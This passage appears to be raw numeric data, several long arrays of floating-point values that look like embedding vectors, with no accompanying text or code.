-0.029409863,0.009244246,-0.048567522,-0.014996203,-0.020897686,0.019386448,0.0664394,-0.03208839,-0.0055597173,0.012769693,0.0053903344,-0.00796286,0.018618742,0.011504025,-0.043468736,0.012555507,-0.038846374,0.0054504112,-0.022487395,-0.046474647,-0.002873499,0.01223443,0.028850265,-0.014217608,-0.0060865874,0.018919852,-0.023082005,-0.022250798,-0.018724022,0.01779141,0.014428127,0.031082606,-0.0087602185,-0.036005817,0.052949935,-0.023842165,-0.032233592,0.013447456,0.073221475,-0.0051392457,0.006041152,-0.07808469,-0.044793703,0.021607535,-0.025850942,0.024539541,0.03233153,0.070125565,-0.0297848,-0.01716408,-0.0019732972,0.036630128,-0.062487125,0.050839342,0.03100267,-0.013161124,-0.018455964,-0.010086468,-0.0040375898,-0.010733695,-0.03164849,0.018629985,0.0048570996,-0.05170514,-0.012529484,-0.023355333,-0.071468584,0.014042774,-0.040944442,0.047256026,-0.013973038,-0.045788806,-0.045260333,-0.03878772,-0.022214103,-0.03330566,0.04272271,0.038834933,0.037125546,-0.03297151,0.04284126,0.05130895,0.0133394925,0.027467225,0.059167817,0.009787255,-0.014709733,0.01583492,-0.021046083,-0.032637555,-0.009965449,0.019970125,-0.037034437,0.0074801287,0.022428237,0.0016020356,0.0010862458,-0.0008695599,-0.009974954,-0.009019552,0.021372754,-0.004715792,-0.06678333,0.040232606,0.016288921,-0.0010243576,0.04067818,0.004652045,0.033594053,0.017453471,0.029756838,-0.011741304,0.059123367,-0.014366628,-0.040690053,-0.054415707,-0.028456038,0.038670197,-0.039060753,-0.02013485,0.032995813,-0.0022408683,0.042753074,0.0058034356,-0.0001303725,0.0357735,-0.052735437,-0.04824412,0.013815119,0.01583234,-0.017291825,0.04867802,-0.0140303215,0.03448641,-0.022404961,-0.034100067,-0.05137585,-0.018622851,0.0028989576,-0.027663888,-0.010351503,0.0068647857,0.025999395,0.026708234,0.061402686,-0.020899326,0.014313981,-0.04293294,-0.03352373,-0.008598704,0.01880483,-0.015165398,-0.0017445553,-0.036291175,0.0005716423,0.0043049054,0.016374277,-0.002860413,0.002299444,0.020007875,0.028596817,-0.0021698044,-0.017962001,0.017680034,0.04253178,-0.005506834,0.03723651,0.051419213,-0.0097002145,-0.00093544653,-0.009637108,0.026245004,0.05858803,0.027488353,0.03114289,0.013644439,0.018232038,-0.0060969163,-0.0031361652,0.026938656,-0.007929687,-0.039836578,0.0015042097,-0.035431914,-0.026579378,-0.056703117,-0.0026541068,-0.014737226,0.0542317,0.03339486,-0.024936348,0.027750097,-0.018609649,0.010533431,-0.046114862,-0.006178363,0.06022625,-0.040410463,0.01360817,-0.017938001,-0.040553134,0.074220784,0.029770872,-0.013949973,-0.03425811,-0.01906974,0.04124176,-0.010572539,0.049118124,0.012329956,0.01666256,0.045208495,-0.051280994,0.04460499,-0.020367673,-0.006995382,0.04493517,-0.03762933,-0.017952152,0.06686045,0.04031523,-0.027543435,0.0040110946,-0.028576436,-0.0151669085,0.06503866,0.013178918,0.072895445,0.041054454,0.021539068,-0.0044981274,0.030421004,-0.003687854,-0.017437847,-0.0050661177,-0.027815545,0.016786253,0.032041334,-0.017273206,-0.0137217585,0.0038856156,-0.005392783,-0.0044046445,-0.041798517,0.043319546,-0.035407837,0.029373027,-0.040714264,0.016350914,-0.012422994,0.006335829,-0.0049498742,0.039706238,-0.017925205,0.014667419,0.050039522,0.03402506,0.012586728,-0.039206028,0.01796778,0.015598737,-0.004417267,-0.06702741,-0.048029598,0.022041526,0.0173271,-0.051832277,0.034784995,0.013513604,0.016885074,0.04730107,-0.024814172,-0.07207674,0.017565597,-0.017663639,0.0038547246,0.059456103,-0.05588502,-0.028535895,0.039657485,-0.0101681445,0.04651115,0.04249063,-0.017138042,-0.07114909,0.010856398,0.00034821997,0.02448169,0.048647437,-0.019445082,-0.018985223,0.039920047,0.025639728,0.02989749,-0.01875047,0.014132992,0.019786503,0.020131618,0.046149712,0.03503512,-0.10231166,0.038176913,0.033144247,0.014154566,-0.019243877,-0.026454464,-0.0050246683,-0.010472527,0.020071868,-0.022178203,0.053921346,0.019964792,-0.031547252,-0.07396809,-0.037587993,0.012109341,0.049070057,0.06522975,-0.041835953,-0.06791304,0.011067071,0.022088204,0.0069990223,0.042086966,0.04500262,0.108108684,-0.033145547,0.011583025,0.0030681952,0.021892777,0.020646024,0.0060648816,-0.012525466,-0.048837394,0.032030646,0.031085346,0.009176192,0.0061354553,-0.07213447,0.014289726,0.057017606,-0.04000232,-0.03483637,0.0593232,-0.02184879,0.023439096,-0.0038578634,-0.02768472,-0.0028234464,0.017850667,0.058457866,-0.0077021406,-0.03375501,-0.025002275,-0.05338254,-0.026942398,0.0006279072,0.032599993,-0.042454727,-0.02645742,-0.027880497,0.065226056,0.028597597,0.040724523,-0.019724645,-0.009264631,-0.023464432,-0.014814213,0.0451335,0.034251563,-0.01201916,-0.020853246,0.035366368,0.016382042,0.018994402,-0.0131257875,-0.01249566,0.08329246,-0.094899766,-0.049990177,0.00310128,-0.011684364,0.061814792,0.031179188,0.009629614,0.011971143,-0.063190505,0.014800777,0.022561496,-0.028815392,0.012095918,0.034595005,-0.010191548,-0.06745715,-0.027544174,-0.07451141,0.010856476,-0.019446524,-0.056343254,0.03174717,-0.014032611,0.041535966,0.04247677,-0.065185286,-0.0022823534,0.027857194,-0.011442871,0.026175946,0.026345735,0.005267954,0.029521612,-0.0068408665,0.04845739,0.06355314,-0.04477522,0.012926853,0.009152459,-0.0584353,0.047438942,-0.002590493,-0.06688368,0.008233034,-0.051161014,0.01941159,-0.03703676,0.018082798,0.029852496,-0.011585366,-0.028836243,0.011572949,-0.042969074,-0.017649775,-0.0037941693,0.053138167,0.03608633,-0.002535718,-0.0061930036,-0.0048055793,-0.015965149,-0.0048549725,0.051517412,0.014730466,-0.066362925,-0.02235456,-0.0030482123,-0.044289697,-0.015967228,-0.0016602,-0.0076932977,-0.048591353,-0.07056355,0.07052969,-0.048569027,0.017895013,0.009497541,-0.06683923,0.015828848,-0.06919652,-0.041123055,0.024909599,-0.025184177,-0.03633999,0.011163739,0.028483186,-0.0031205632,-0.005668343,0.038942087,0.010725653,-0.014561717,-0.048694693,-0.024698664,0.024622591,0.0015795324,0.041577257,-0.050341412,0.013969738,0.084394045,-0.021513807,0.057323765,-0.0121030845,0.025457362,0.033167753,0.013028393,0.034114677,-0.0033431074,-0.015785675,-0.013792996,0.019590518,0.008923777,-0.02184881,-0.00023181693,0.014248692,-0.04466388,0.031891942,-0.08003667,0.03395297,-0.013272797,-0.0028419879,-0.09141212,0.04724045,0.0110679595,-0.04203053,-0.008116414,-0.0337454,-0.03818995,-0.0847544,0.03317688,-0.043788113,0.03622361,0.0059267483,0.04697866,0.04403627,0.018426735,0.0030331053,0.016582329,0.05009015,-0.053249527,0.015443921,0.09049188,0.036428697,-0.027416896,0.09662272,0.08346991,-0.016800467,0.0011439855,-0.025498921,-0.0027288932,0.02750694,-0.016425015,-0.021745792,-0.051124796,-0.019990621,-0.003576022,0.00072497566,-0.006617238,0.006061951,-0.028923217,-0.054397874,-0.014557214,-0.051591527,-0.053822607,0.050322194,0.012400271,-0.009210228,-0.024705384,0.026163278,0.0034178498,0.0034159173,0.08736813,0.0035097026,-0.012869968,0.018120077,-0.019133808,0.043431286,-0.04294532,-0.034275718,-0.053929213,0.047422603,-0.04013646,-0.067144185,-0.016166931,-0.047208093,-0.036595248,-0.025461119,-0.0041034743,-0.04840501,0.07286625,0.017841134,-0.0193172,-0.032721214,0.065795444,-0.009117584,0.014136987,-0.03303108,0.02996339,0.030550214,-0.02792495,0.031252857,-0.019972304,-0.011758743,-0.06183133,-0.024148848,-0.0016420335,-0.01826383,0.06707519,0.04413715,0.009033458,-0.030310726,-0.026644142,-0.035103686,0.06335967,0.03247269,-0.013643859,-0.007982694,0.035235118,0.0044924654,-0.01906755,0.011369642,-0.021506457,0.010346782,0.012386696,-0.043360844,-0.055396434,-0.04310683,0.046027694,0.00054678513,0.01646125,0.0007451488,-0.011736936,-0.06413256,-0.006024293,-0.04552004,0.032297753,0.014070104,-0.008859747,-0.0021171246,-0.0046385936,-0.0078047807,0.03097607,0.00031093674,-0.03813086,-0.010109916,-0.008598316,-0.065023154,0.028616408,-0.023944458,0.035825126,0.00785628,0.017771028,0.10364243,0.005936669,0.026079427,-0.030793497,0.034066144,0.017449476,-0.035019167,-0.035058305,0.021374037,-0.033070467],[0.0014006213,0.09329062,-0.18229996,-0.07905562,0.060293585,-0.008825001,0.017735895,0.01917517,-0.041350953,-0.033218473,-0.0066110487,0.014424868,0.10106502,-0.027364444,0.000988116,-0.051134713,-0.042510346,-0.04274801,-0.02018443,0.049269296,-0.023297476,-0.031634334,-0.010664482,-0.042210117,0.054543182,0.08821708,0.010516076,-0.02019222,-0.019826243,-0.032229476,-0.0050840215,-0.024072556,-0.014183061,0.04104702,-0.04719388,-0.030917676,0.00651562,-0.014707364,-0.0053228973,0.022242537,0.043501113,0.038769484,0.0010432358,-0.05392525,0.029891836,0.019251171,0.01166614,-0.004992472,0.06172624,-0.04824984,-0.03353716,0.002497932,0.017624902,0.038884174,0.07816354,0.025149275,-0.04166976,0.044125933,0.014825086,-0.044435732,0.091744974,0.072393574,-0.0887056,0.050410386,0.04645117,-0.04665019,-0.04027099,0.061225604,0.017171407,-0.048223466,0.054837987,-0.020781739,0.007887155,0.027384244,-0.07797212,-0.012060594,-0.00007033877,-0.016939035,-0.041576136,0.029256117,0.012881961,0.010128689,0.047406826,0.005620587,0.07523998,-0.03871648,-0.037486393,0.019748228,-0.017298318,0.04845083,0.037249897,-0.00014508948,0.0443242,-0.00025417225,-0.042534575,0.012378661,-0.009334087,0.030817656,-0.03175031,-0.020890836,-0.055271592,0.006531421,0.016140843,0.009709919,0.019278282,0.05104371,0.011900859,0.02185898,-0.06044109,-0.026139576,-0.033480816,0.03059048,-0.0392097,-0.018193353,-0.061043866,-0.01757381,0.023556804,0.0014844424,-0.052410647,0.030429594,0.0030284491,-0.017018234,0.0028158217,0.033406507,-0.026067818,-0.0140902,-0.020970624,-0.0050987597,-0.02364495,-0.018790886,0.008178384,-0.055727255,-0.048206665,-0.01952342,0.016114399,0.020397458,-0.043969132,-0.018022308,0.020945849,0.04548777,0.03425951,0.0014906747,-0.011154667,-0.051146593,0.0092476215,-0.023560893,0.016557526,-0.029997192,-0.05167005,0.03813508,0.06379794,0.032997042,-0.010775117,0.0036279706,0.0144999195,-0.04509872,0.0041818754,0.0040738736,-0.0016609848,-0.010651667,0.020226592,0.02395814,-0.040460188,0.06626003,0.025681606,-0.048120555,-0.027221853,0.027269391,0.014568626,0.060982205,-0.033105783,-0.043836597,-0.010019632,-0.02481067,0.04944232,-0.0312213,0.069514506,-0.02525824,0.071835965,-0.008337298,0.01791404,-0.0621925,0.03157003,0.007255092,-0.030002074,-0.00585366,-0.014927242,-0.013347519,0.0058824983,-0.042950492,0.002331628,-0.031757545,-0.07013341,-0.025957042,-0.0040821605,-0.033808958,0.02539456,0.012559946,0.033087872,0.0014053627,-0.037242338,0.020323878,-0.067504734,0.01204191,-0.040988717,0.08604632,-0.02013917,0.012611737,-0.03823652,0.01918378,0.054868165,-0.007700429,0.018853132,0.058937967,0.003512757,-0.011641489,-0.029757516,-0.02056564,-0.0155571075,0.03046838,0.024157751,0.0039033543,0.025339786,-0.021292118,0.06682282,0.020968055,-0.05187628,-0.05456387,0.032652106,-0.013597272,0.016039863,-0.11584054,0.048516054,-0.021620072,0.014439902,0.02905142,0.024553925,0.05357781,-0.03263979,-0.009746299,-0.017417513,0.034424577,-0.023536548,0.018951606,-0.040298466,-0.024310378,-0.0079611465,-0.021270396,0.050735798,0.053517535,-0.004393685,-0.034537755,0.028097054,0.06178038,0.019165581,-0.047086377,-0.013922797,0.005765961,-0.0004168144,-0.004698436,0.037781537,-0.029965732,0.016485663,-0.022710161,-0.011143637,-0.0041187494,-0.00020470568,-0.0049214787,0.00077380333,0.000260085,0.06923897,-0.002966919,0.010460741,0.02440991,-0.032354273,0.03186257,-0.021502456,-0.015821831,-0.04515861,0.0042946856,-0.02640304,-0.0069362023,0.0005955833,-0.011775608,-0.00058888644,0.023258308,0.006394429,-0.023313541,0.011149022,0.006615512,0.009138946,-0.020688718,-0.0068102046,0.0037359337,-0.0021732468,0.023630241,0.020717392,-0.008307833,0.017973961,-0.086247936,0.020181257,0.03271081,0.067873426,0.049310748,0.010382862,-0.026682448,-0.0012434971,-0.004520001,0.027978724,-0.042283338,-0.041583635,-0.005027661,0.01031235,0.057797067,-0.02708027,0.053333394,0.061116856,-0.009989401,0.05280959,-0.03454758,0.006615302,-0.076595314,0.037599858,-0.0708596,0.0038858564,0.103278376,-0.018364605,0.040592916,-0.016903894,-0.017015276,0.03260898,0.015645767,0.006730372,-0.018428426,-0.06490332,0.031098036,0.017742822,-0.022074003,0.040328898,0.062562145,0.03058241,0.033825286,0.017671801,-0.06194957,0.007872486,0.013918337,-0.028477544,-0.0050903517,0.08953319,0.034989726,0.0018305107,0.012451197,0.015925188,0.0041026426,0.01245638,0.019145602,-0.011668456,0.04902567,0.008189064,-0.027390504,0.052588463,-0.009949821,0.03100325,0.011415896,0.007322296,0.019277507,0.024044339,-0.012188039,0.014375602,-0.020533528,0.012589761,-0.012081452,-0.03700764,0.003394235,0.011699967,0.007310538,-0.10510528,-0.006259415,-0.03414411,-0.0010682375,0.049049605,0.029823355,-0.02655456,0.024788966,0.012328708,-0.025158176,0.0077208276,-0.02598398,-0.0013773864,-0.022681281,-0.012887082,-0.013967464,-0.058833532,-0.0013577263,0.017463775,-0.05972753,0.020119002,0.031604145,-0.0018764787,0.08915411,-0.025317343,-0.08563996,0.0012972045,-0.016597563,-0.011901282,0.054392114,-0.041037694,-0.0521922,0.03698624,0.033354662,0.014386934,0.04003879,-0.005072992,-0.03451458,0.029652407,0.019813107,0.040547285,-0.03520868,-0.033316236,-0.015714366,0.035183355,0.004222576,-0.00893139,-0.014569301,0.022312956,0.029506572,0.03562212,0.029699933,-0.006676848,-0.013394076,0.064643726,0.02850802,0.033025257,0.018754996,-0.02361058,-0.0019187767,0.004978053,0.006067032,-0.023749053,0.004340345,0.018917805,-0.06906322,-0.03425575,-0.068715096,0.0032879428,0.05379933,0.010013792,-0.029338637,-0.073500685,0.06094277,0.021580521,-0.009953806,0.0024408794,0.004279887,0.12403356,0.032331627,0.0013963968,0.042487133,0.0049893493,0.03683839,0.0064261435,-0.018224277,-0.02027588,0.011023612,-0.0042642197,-0.03821425,-0.05171811,-0.019289462,0.044360865,0.04635847,-0.069562,0.012913333,0.005748525,-0.06090031,-0.022208788,0.020460922,-0.017368315,-0.015014039,-0.028211636,0.043868225,0.021083588,-0.0332795,-0.052947458,-0.01284369,0.021571549,0.02636742,0.025181629,-0.018901905,-0.031964432,-0.0166417,0.022715626,-0.003907649,0.06262627,-0.027716732,-0.0071757673,0.02726449,-0.023800531,-0.015335906,0.010572705,0.026645115,0.052946754,0.04212368,-0.007165014,0.019030185,0.016672377,-0.012511046,0.09129207,-0.045325324,-0.030372651,-0.024986543,-0.0076148915,0.0018295568,-0.014069456,0.013352237,0.051846072,-0.041778762,0.00026645698,0.049561474,-0.03597076,0.009663498,-0.020670943,-0.0630924,0.019902535,0.0062061367,-0.048158165,0.0009650382,0.016574202,-0.027357182,0.0005020245,-0.0001290755,0.03016841,0.051025476,-0.05215878,-0.020122962,0.020713866,0.025427172,-0.1091864,-0.00983393,0.035625596,0.042375233,-0.017915541,0.018518632,0.02895945,-0.038082715,0.008073697,-0.01605296,-0.023580423,-0.0025586635,0.0046584727,-0.05564593,0.044605974,-0.0075563523,0.029596113,-0.011409327,0.039985385,-0.05869041,-0.006760148,0.020449547,-0.03665627,-0.031043548,-0.020602169,0.030708577,0.03929279,0.017238045,-0.027265886,0.009799912,0.002060214,-0.011256426,-0.03930366,0.0035039124,0.043335583,-0.04544559,-0.036250714,-0.04491748,0.032640602,0.008547698,0.03289104,-0.026699914,-0.05357259,-0.071505785,0.033805348,-0.04527761,0.03752287,0.016993428,-0.01896568,-0.008547032,-0.05505939,-0.0020596473,-0.0306625,-0.04096568,0.04280404,0.042654358,0.057567976,-0.049628176,-0.02976425,0.011746833,-0.0025556746,0.03569601,-0.055631306,-0.074213095,0.037796143,0.010423464,0.058742795,-0.018636912,0.055055063,0.018645296,-0.02483149,-0.0032428773,-0.019633636,-0.038742278,0.055891927,0.00065825897,-0.05232034,-0.013366786,0.0015993777,-0.05368793,0.06954088,-0.026698204,-0.039902896,-0.022254605,0.0073291464,-0.047249753,0.017893013,-0.053217,0.022017308,-0.012361888,-0.055985827,-0.029390967,0.013039626,0.029787147,-0.009965233,0.0018354004,-0.027071742,0.007218422,-0.100914516,0.022883331,-0.023777395,0.009867705,0.014162719,0.03411179,0.054515243,-0.053229224,0.019558376,0.029055547,0.10318479,0.030521309,0.011098081,0.022529934,0.05321476,-0.04696469,0.06285275,0.056659684,-0.008084462,0.014252772,-0.015896736,0.0005588224,0.031917214,-0.034718517,-0.061721377,-0.03942683,-0.053265847,0.029820593,-0.03981377,0.015752267,0.00722869,0.014337144,-0.0017465987,-0.019710442,-0.014553532,-0.034110945,0.02976479,-0.0040037897,0.003603625,-0.016631994,-0.00047937248,0.021233045,0.03727817,0.026965532,0.003416484,0.005818149,0.013929384,0.0418025,0.024099335,-0.037158508,-0.014900417,-0.019789966,0.026162347,-0.067903,0.021033164,-0.012654403,-0.0144816125,-0.055247262,-0.023688532,-0.025957637,-0.00054080866,0.022967422,-0.015023039,-0.00018192318,-0.05084384,0.06642146,0.007369936,0.0015990665,0.008207054,0.025762111,0.00052482163,0.017173745,0.009666779,0.013414126,0.033733983,-0.06301751,-0.009543862,0.022365244,-0.009396517,0.032394733,0.022157347,0.05426604,-0.012604952,0.0017361209,-0.023131404,0.0036874586,0.03553587,-0.029107481,-0.048616216,0.020833323,0.00608045,0.010612629,0.023638016,-0.03916902,-0.0018721907,-0.012011628,-0.02447571,-0.02771072,-0.040026475,0.063397445,0.015315241,0.033203665,0.008486667,0.0000987807,-0.014267254,-0.009926856,-0.010104515,0.021818317,-0.01679772,-0.0080701355,-0.03456402,-0.0012495731,-0.047517873,0.056993235,0.055009075,-0.04519355,0.01417617,-0.008713757,-0.016724063,0.02746802,-0.015469697,-0.009294272,0.025105754,0.033740707,0.128432,0.06275769,0.007389566,-0.031278156,0.072281376,0.005886878,-0.054874256,-0.008141854,-0.034615006,0.00026921567],[0.05441699,0.011924909,-0.16821773,-0.08318279,0.04824237,-0.06936313,0.04022156,0.058735352,-0.03728516,-0.050670642,0.014121811,0.018936524,0.075403154,-0.0074511813,0.001056189,-0.0038642685,-0.027273241,-0.04509943,-0.013868144,0.050629027,0.045147307,-0.0087933475,0.019312602,-0.051346537,0.08692276,0.021155847,-0.021452764,0.010687678,-0.04804473,0.038538173,0.015900215,0.0035160587,-0.026974251,-0.0013550357,-0.02111459,-0.030529438,0.046489414,0.024204977,0.026821623,0.032603867,0.04288923,0.052386224,0.009265637,-0.014489134,0.010594012,0.019569786,0.056533795,-0.016008051,0.008825281,-0.07596468,-0.01159198,-0.013324615,0.04576559,0.014892045,0.053768646,0.054270178,-0.027257718,0.033545196,-0.00527558,-0.07153538,0.082309075,0.06694403,-0.10550834,0.081230864,-0.027174963,-0.037967257,-0.025452591,0.04570634,0.00015364143,-0.03442924,0.018994153,0.020114562,-0.01935032,0.051848684,-0.0874648,-0.022787662,-0.020943549,-0.00010803508,-0.00469226,0.048391514,0.013089587,-0.040575225,0.0618345,0.02001021,0.01738339,-0.049067367,0.010042423,0.0101734,-0.024309734,0.062311012,-0.014117827,-0.04577768,0.02863887,-0.048673283,-0.04913503,0.022609226,-0.011536939,0.034881048,-0.051969912,-0.0061891284,-0.030572258,-0.019610433,0.031796258,0.0115540605,-0.019169152,0.0541499,0.02155929,0.028583009,-0.039998416,-0.032087326,-0.026632568,0.044628017,-0.0040401393,0.015646826,-0.030776504,-0.035522692,0.07785593,-0.011954509,-0.03268875,0.024251306,-0.026805243,-0.06100285,-0.00995795,0.037049975,-0.006696419,0.012548935,-0.055337228,0.047572196,0.0048499703,-0.045696773,-0.029248262,-0.023686634,-0.020727457,-0.024804635,0.037439566,0.043878503,-0.0041616904,-0.0062625078,0.017793741,-0.0037370843,0.022684203,0.060434844,-0.008842581,-0.016489882,0.018567493,-0.06329635,0.020256924,-0.016266901,0.00030696407,0.020012526,0.03278171,-0.0021599233,-0.014172069,-0.020341646,-0.0089335805,0.016730867,0.022413693,0.01717015,-0.014546927,0.007149498,0.02267005,-0.0027125035,-0.042788,0.047965866,0.015879689,-0.037923582,-0.024630928,0.05483027,-0.008437469,0.018468328,-0.07234079,-0.029838212,-0.011506853,0.008855883,-0.018481508,0.02848089,0.051545314,-0.044536203,0.027398825,-0.02228561,0.0061802263,-0.04434324,0.053673398,0.0019003351,-0.015335214,-0.013621848,0.002629453,-0.013578249,0.0138413375,-0.058370672,0.0032157586,-0.006274752,-0.050928347,-0.006891565,-0.027097248,-0.05696178,0.0164795,-0.008281751,0.01880856,-0.04795002,-0.061692312,-0.017252708,-0.060337216,0.0015741927,-0.03567438,0.049035493,0.008091273,0.048267696,-0.0437781,0.058622845,0.044724174,0.0014274727,0.014293701,0.042518284,-0.019008296,-0.012562273,0.0035827828,0.0012076072,-0.027090322,0.0022027388,0.0029500362,0.0145869395,0.015720066,0.021529602,0.030184485,-0.005419726,-0.04012,0.02318296,-0.015288424,-0.029645564,0.008518009,-0.0879604,0.030125812,-0.036217567,-0.014185391,0.036125142,-0.017033167,0.04880228,0.0028992982,0.015417139,-0.022761554,0.07234109,-0.027423268,0.0058614006,0.009351803,-0.019849613,0.010092214,-0.0023643305,0.02443829,0.057500068,0.04870373,0.009939936,0.0011327519,0.019929726,0.04904833,-0.061056875,-0.017023262,0.023816343,0.024297236,0.0040490553,0.047680803,-0.001702832,0.0077024424,-0.025663374,-0.03811561,-0.033810258,-0.03832702,0.001222364,-0.0007728119,0.040328536,0.047130235,0.009038261,0.015481276,0.027023792,0.0142849665,0.022641605,-0.026600875,-0.014922027,-0.022751058,0.015792584,0.013712694,-0.047249485,0.0044484837,0.033434268,-0.035520207,0.032386735,-0.028707238,-0.06207984,0.011754087,0.021206018,-0.0053101624,0.001741323,-0.04209692,0.012208848,-0.020620275,0.01863158,0.012560985,0.028981268,0.01592372,-0.029616125,0.0022832374,0.018111562,0.039630752,0.061117724,-0.012530721,-0.009212697,0.01850135,-0.033464573,0.0078599015,-0.034743752,-0.053113073,-0.019939035,-0.035563186,0.0020391769,-0.027114453,0.038882606,0.016222734,-0.023115253,0.044256568,-0.020621603,0.024566935,-0.05284025,0.06028663,-0.03702597,-0.017050717,0.06687036,-0.03121463,0.037399583,-0.012026839,-0.0057943347,0.048528645,0.048033286,-0.005976987,-0.053073943,-0.03764225,0.05300986,-0.02258146,-0.019868659,0.029368775,0.037679482,0.06340188,0.02914329,0.051264714,-0.056645773,0.0218618,0.066720545,-0.026363373,-0.027548488,0.04190615,0.03253966,0.011689236,0.018624784,-0.0071226535,-0.04077585,0.026411628,0.016740905,0.017192552,0.03972523,0.024630303,-0.028324677,0.041251976,0.029462365,0.020260131,0.0025557256,-0.03258057,0.008361695,0.05256024,0.01647737,0.0005739924,0.0031723597,-0.0038624369,-0.02610287,-0.0026418676,0.023773666,-0.04816164,0.013642013,-0.0635371,0.018550346,0.004009264,0.02700527,0.05414826,-0.026943272,-0.0077363034,-0.0063242973,0.008701554,-0.02624327,0.01765103,0.0032165023,0.01765312,-0.0070726895,-0.037636813,-0.036730092,-0.03740224,0.0074774004,0.03721623,-0.02628379,0.017914454,0.011871438,-0.029025843,0.03650399,-0.042747587,-0.03452441,0.04116823,0.012371989,-0.031171052,-0.009274734,-0.041351303,-0.0481267,0.022419512,-0.0009605781,0.019288171,0.06364633,-0.023253577,-0.056742556,0.016573252,-0.0037415626,0.056288745,0.017954085,0.016473038,-0.042482644,0.024534125,0.012885311,0.043119445,0.040358044,0.005699556,0.038481455,0.021941261,0.027842864,0.021872653,-0.093191385,0.048230574,0.035900097,0.02430385,0.017419884,-0.032179885,-0.0013275674,0.023824878,0.039514016,-0.019601997,0.0136292325,0.01363297,-0.09566118,-0.020795636,-0.041082837,-0.0111085465,0.09695661,0.062488724,-0.06477663,-0.08227869,0.05003793,0.023520045,0.013154296,0.0049244747,0.0045391596,0.1354178,-0.0435106,-0.01612965,-0.010573918,0.029147455,0.0016699322,0.015485285,0.007707142,-0.06526821,0.022867572,-0.01658084,-0.053987052,-0.02395287,-0.039697222,0.02480787,0.07673468,-0.07998183,0.0037875776,-0.011310102,-0.08166503,0.037997454,0.038137637,-0.041289363,0.013636872,0.013282834,0.0664898,0.0116677955,-0.038348716,-0.028454134,-0.040273238,-0.018685004,0.036120627,0.045992922,-0.030595846,-0.028902188,-0.006562668,0.0007560298,0.015033534,0.080608256,-0.025881954,-0.011016151,-0.020290101,-0.035133004,0.023320813,-0.008206917,-0.030210389,-0.0045635095,0.060166724,0.0053527155,0.026378613,-0.008539968,-0.008757261,0.051637683,-0.034524832,-0.0104671735,0.0038746933,-0.009721872,0.004411853,0.023379626,0.03157164,0.05094169,-0.056450393,0.03686986,0.042957984,-0.04427607,-0.034678847,0.0051213684,-0.07148597,-0.009853798,0.004762482,-0.0480444,0.024729108,0.014710017,-0.054245096,0.0354036,-0.014944361,0.010543465,-0.0020526235,-0.05083599,-0.016283417,-0.000984916,-0.028211577,-0.049193237,0.008747273,0.020763654,0.031561114,0.03204648,0.03595603,0.04355618,-0.035903443,-0.0030850968,-0.053665806,-0.00872702,0.021406725,0.01548182,-0.06560639,0.034509994,-0.076307625,0.021930367,-0.037973803,0.027925462,-0.040004224,-0.00431383,-0.03716431,-0.025147691,-0.045562424,-0.011118988,0.00778502,0.08350292,0.016905291,-0.020220142,-0.018125923,0.010948262,-0.008386478,-0.0050175497,0.045511432,0.0127125,-0.05219623,-0.0023053952,-0.0054164743,-0.017149886,0.02651965,0.041187834,-0.0043830187,-0.04888085,-0.063875444,0.029862659,-0.016731674,0.030941097,0.028041035,-0.07032705,0.029940896,-0.027473118,-0.017576711,-0.008489859,-0.030999994,-0.04267715,0.043299925,0.030331897,-0.013408774,0.008250249,0.025456112,-0.0025236062,-0.019103648,-0.021155009,-0.07829779,-0.0120079825,0.035292093,0.05721573,-0.05273745,0.03965048,0.077502005,-0.044587117,0.051872227,-0.007775535,-0.016404333,0.03434181,0.0012779122,-0.03568801,0.0043469435,-0.0063065584,-0.05907191,0.04874687,0.013674134,0.027412292,-0.039854348,-0.02033491,-0.07187663,0.046935234,-0.058239736,0.03685383,0.010890046,-0.042065095,-0.04804971,0.03634096,-0.013212741,-0.046734344,0.0012375808,-0.04940555,-0.0039020926,-0.115116745,0.0045266286,-0.017077122,0.06422297,0.021910496,0.03202216,0.030697355,0.008368847,0.009311717,0.012403202,0.045392077,-0.052046068,0.026156446,0.059378568,0.07122691,-0.019725906,0.05117634,0.09688003,0.025316607,0.0101542715,0.004224266,-0.012109353,0.009666422,-0.029092427,-0.05777179,-0.0116839595,-0.041547142,0.010460307,0.012442301,-0.0420955,0.016762411,0.0155357625,-0.023551226,0.005211022,-0.017466072,-0.030132473,0.046613637,-0.0069698547,0.004098289,-0.005121815,0.015873967,0.023545654,0.04845459,0.03982815,-0.019570136,-0.011737079,0.016759561,-0.004873917,0.02189601,-0.07126456,0.046416435,-0.04132576,0.010212045,-0.0076033603,-0.039120212,-0.051206373,-0.05621907,-0.020508537,-0.022932949,-0.01211847,-0.008184176,0.045206804,0.022653386,-0.030883234,0.016551342,0.05111585,-0.034034483,-0.004413964,0.015326384,0.021565164,0.011272674,-0.037903905,0.007606211,-0.015295584,-0.002320065,-0.06456901,-0.057606477,-0.031201866,-0.02288394,0.03855101,0.010743286,0.026627101,-0.026588514,-0.014013956,-0.016797807,0.0115960995,0.023030687,-0.0016965407,-0.030880066,0.024722792,0.021095589,0.0015114667,0.03604323,-0.037608113,0.031650614,-0.0064766738,0.016110847,-0.032917514,-0.04597326,0.05790136,0.0034994846,0.032477457,-0.009682953,-0.056419704,-0.0675658,-0.023414407,-0.006793823,0.06183132,-0.030580437,0.004301713,-0.024698913,-0.0147055825,-0.040283956,0.063457996,-0.01965747,-0.044954762,-0.010231486,-0.033822604,0.0029838027,0.034336515,-0.009867026,0.0065711723,0.043589897,0.052217785,0.092968546,0.035955675,0.013737163,-0.021782754,0.024854325,0.01619626,-0.027054125,0.012972541,0.01195788,0.00054015603],[0.045770064,0.07471897,-0.16511135,-0.03876734,0.14571248,0.024614688,0.055063587,0.020725502,-0.011163768,-0.013094777,-0.017359782,-0.03351444,0.076325975,0.017405266,-0.02532377,-0.007784501,0.004349201,-0.06845142,0.013961276,0.06647471,-0.025120333,0.012127889,0.016413372,-0.03344633,0.03692266,0.028586132,-0.037626,0.0031801248,-0.01298809,-0.030244192,0.07437327,-0.03359977,-0.039326534,-0.024949962,-0.10754117,-0.03980531,0.016348317,0.043164,0.042000674,0.016964108,0.031522807,0.004366226,-0.004128801,-0.039476078,-0.011847055,0.01631858,0.008249519,0.009778495,0.02214415,-0.04680716,0.03905997,-0.022749938,0.08050906,0.008975754,0.11274677,0.05946567,-0.010163257,0.035433553,0.0016097747,-0.099658534,0.081070475,0.05009368,-0.09939559,0.065691754,-0.006116505,0.005482851,-0.011445111,0.023699261,0.026198907,-0.093913026,0.027213626,-0.024414731,-0.012962527,0.0036511545,-0.04241266,0.010240197,-0.034033258,-0.010236345,-0.02997033,0.02600857,0.010352797,0.005045873,0.04360123,0.021170795,0.036958426,-0.009247992,-0.025074765,-0.006627046,0.0019972504,0.105092466,-0.0013053011,0.011684353,0.035070296,-0.005263676,-0.04107756